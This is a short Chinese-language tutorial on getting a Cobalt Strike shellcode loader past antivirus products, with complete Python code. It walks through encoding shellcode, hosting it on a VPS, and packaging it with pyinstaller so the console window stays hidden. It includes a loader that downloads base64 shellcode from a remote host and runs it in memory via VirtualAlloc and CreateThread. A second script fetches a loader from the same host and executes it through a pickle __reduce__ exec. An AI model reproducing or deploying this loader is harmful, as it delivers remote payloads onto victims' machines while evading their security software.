python shellcode免杀（过最新360，火绒，不过最新的windows））

 

第一步cs生成python版测shellcode

第二步 提取双引号内容，并进行base64编码，放入python04.TXT

第三步 shellcode加载器修改地址，并进行base64加密，放入pythonshellcode.txt。同时将pythonshellcode.txt和python04.txt放到vps，并开启http服务

python -m SimpleHTTPServer 8080

第四步 修改main.py 并且使用pyinstaller打包exe

pyinstaller -F -w main.py

-w 去黑窗

 

shell code

import ctypes,urllib.request,codecs,base64
shellcode = urllib.request.urlopen('http://192.168.195.140:19000/shellcode.txt').read()
shellcode = shellcode.strip()
shellcode = base64.b64decode(shellcode)

shellcode =codecs.escape_decode(shellcode)[0]

shellcode = bytearray(shellcode)
# 设置VirtualAlloc返回类型为ctypes.c_uint64
ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64
# 申请内存
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000), ctypes.c_int(0x40))
# 放入shellcode
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
ctypes.windll.kernel32.RtlMoveMemory(
    ctypes.c_uint64(ptr), 
    buf, 
    ctypes.c_int(len(shellcode))
)
# 创建一个线程从shellcode放置位置首地址开始执行
handle = ctypes.windll.kernel32.CreateThread(
    ctypes.c_int(0), 
    ctypes.c_int(0), 
    ctypes.c_uint64(ptr), 
    ctypes.c_int(0), 
    ctypes.c_int(0), 
    ctypes.pointer(ctypes.c_int(0))
)
# 等待上面创建的线程运行完
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle),ctypes.c_int(-1))

main

import pickle
import ctypes,urllib.request,codecs,base64
sectr = urllib.request.urlopen('http://192.168.195.140:19000/loader.txt').read()
sectr = base64.b64decode(sectr).decode("utf-8")
class A(object):
    def __reduce__(self):
        return (exec, (sectr,))
ret = pickle.dumps(A())
ret_base64 = base64.b64encode(ret)
ret_decode = base64.b64decode(ret_base64)
pickle.loads(ret_decode)